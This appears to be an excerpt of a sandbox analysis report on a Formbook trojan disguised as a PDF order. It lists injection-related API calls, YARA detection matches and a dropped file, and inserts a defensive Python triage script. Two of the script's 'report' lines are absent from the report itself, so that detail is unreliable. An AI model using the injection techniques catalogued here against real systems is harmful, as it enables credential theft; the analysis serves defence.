Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F595D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F598A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F5B040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F599D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59A80 NtOpenDirectoryObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F5A3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F595F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F59560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F5AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F596D0 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59FE0 NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DAAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04DA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1A070 NtClose,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1A120 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E19FF0 NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E19F40 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1A09A NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1A11A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E19FEB NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E19F3A NtCreateFile,
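The native-API listing above is the raw material a triage script works from: each "Code function" entry names an ntdll stub resolved in the RegSvcs.exe (pid 6) and cmmon32.exe (pid 11) images, and the injection primitives the report's signatures name (process hollowing, APC queuing, section mapping, thread-context modification) are each a recognisable subset of that list. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses a constructed subset of the report's own lines (same layout, with or without a cell separator) and maps each process's resolved Nt* functions onto the injection techniques they enable. The technique-to-API table is my assumption, chosen to mirror the report's signature names, and the helper names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the report's "Code function" lines, in the
# same "Source: <image>Code function: <pid>_<run>_<addr> <apis>," shape.
REPORT_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F599D0 NtCreateProcessEx,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F598A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5B040 NtSuspendThread,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5A3B0 NtGetContextThread,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5AD30 NtSetContextThread,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59A20 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59950 NtQueueApcThread,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F599A0 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA9950 NtQueueApcThread,",
    r"Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E19FF0 NtReadFile,",
    r"Source: C:\Users\user\Desktop\Nuevo orden pdf.exeCode function: 0_2_008CA1D3",
]

# Tolerates both the concatenated cells of the raw report and a " | " separator.
LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>.*)$"
)

# Assumed mapping from injection technique to the syscall stubs it needs; the
# names mirror the report's own signatures. Tune the sets for your environment.
TECHNIQUES = {
    "process_hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "apc_injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section_mapping_injection": {"NtCreateSection", "NtMapViewOfSection", "NtResumeThread"},
    "thread_hijacking": {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
}


def parse_report_line(line):
    """Return {'image', 'pid', 'addr', 'apis'} for one report line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = [a.strip() for a in m["apis"].split(",") if a.strip()]
    return {
        "image": m["image"],
        "pid": int(m["pid"]),
        "addr": int(m["addr"], 16),
        "apis": [a for a in apis if a.startswith("Nt")],  # keep syscall stubs, drop loader internals
    }


def apis_by_process(lines):
    """Union of resolved Nt* names per sandbox pid."""
    by_pid = defaultdict(set)
    for line in lines:
        rec = parse_report_line(line)
        if rec:
            by_pid[rec["pid"]].update(rec["apis"])
    return dict(by_pid)


def classify_injection(apis):
    """Techniques whose full primitive set is present in this process."""
    present = set(apis)
    return {name for name, needed in TECHNIQUES.items() if needed <= present}


def triage(lines):
    return {pid: classify_injection(apis) for pid, apis in apis_by_process(lines).items()}


if __name__ == "__main__":
    for pid, techniques in sorted(triage(REPORT_LINES).items()):
        print(f"pid {pid}: {sorted(techniques) or 'no complete injection primitive set'}")
```

Because the report lists resolved stubs rather than an execution trace, a match here means the capability is present, not that it ran: any process that loads ntdll can reach these functions, and a debugger or an endpoint agent resolves the same sets. Confirm the order the calls actually occurred in (a child created suspended, then unmap, write, set-context, resume) before calling it hollowing.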
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Code function: 0_2_008CA1D3
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Code function: 0_2_012FC2B0
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Code function: 0_2_012F9990
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | Code function: 0_2_008CA42F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041E1F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041D183
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041D186
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041E45A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041DDD1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409E3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE28EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F420A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE20A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F2B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FEE824
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FD1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F34120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F1F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE22AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FDDBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE2B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FDD466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F2841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F2D5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE25DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F42581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F10D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE2D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE2EF7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F36E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FDD616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE1FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FEDFCE
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D7B090
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E320A8
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D920A0
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D7841F
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E21002
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D7D5E0
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D92581
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E31D55
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D6F900
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E32D07
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D60D20
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D84120
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E32EF7
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E322AE
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D86E30
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E31FF1
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04D9EBB0
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04E32B28
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1E1F9
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1D183
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1D186
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1E45A
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E1DDD1
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E02D90
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E09E40
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E09E3C
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_00E02FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00F1B150 appears 35 times
            Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 04D6B150 appears 35 times
            Source: Nuevo orden pdf.exe, 00000000.00000002.234863690.000000000C360000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.228288277.0000000001060000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.227705180.00000000009A0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSize.exe> vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.235277378.000000000C460000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe, 00000000.00000002.235277378.000000000C460000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe | Binary or memory string: OriginalFilenameSize.exe> vs Nuevo orden pdf.exe
            Source: Nuevo orden pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Nuevo orden pdf.exe.3ed69a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Nuevo orden pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: NkwKQPLeekw.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/4@3/4
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe | File created: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe
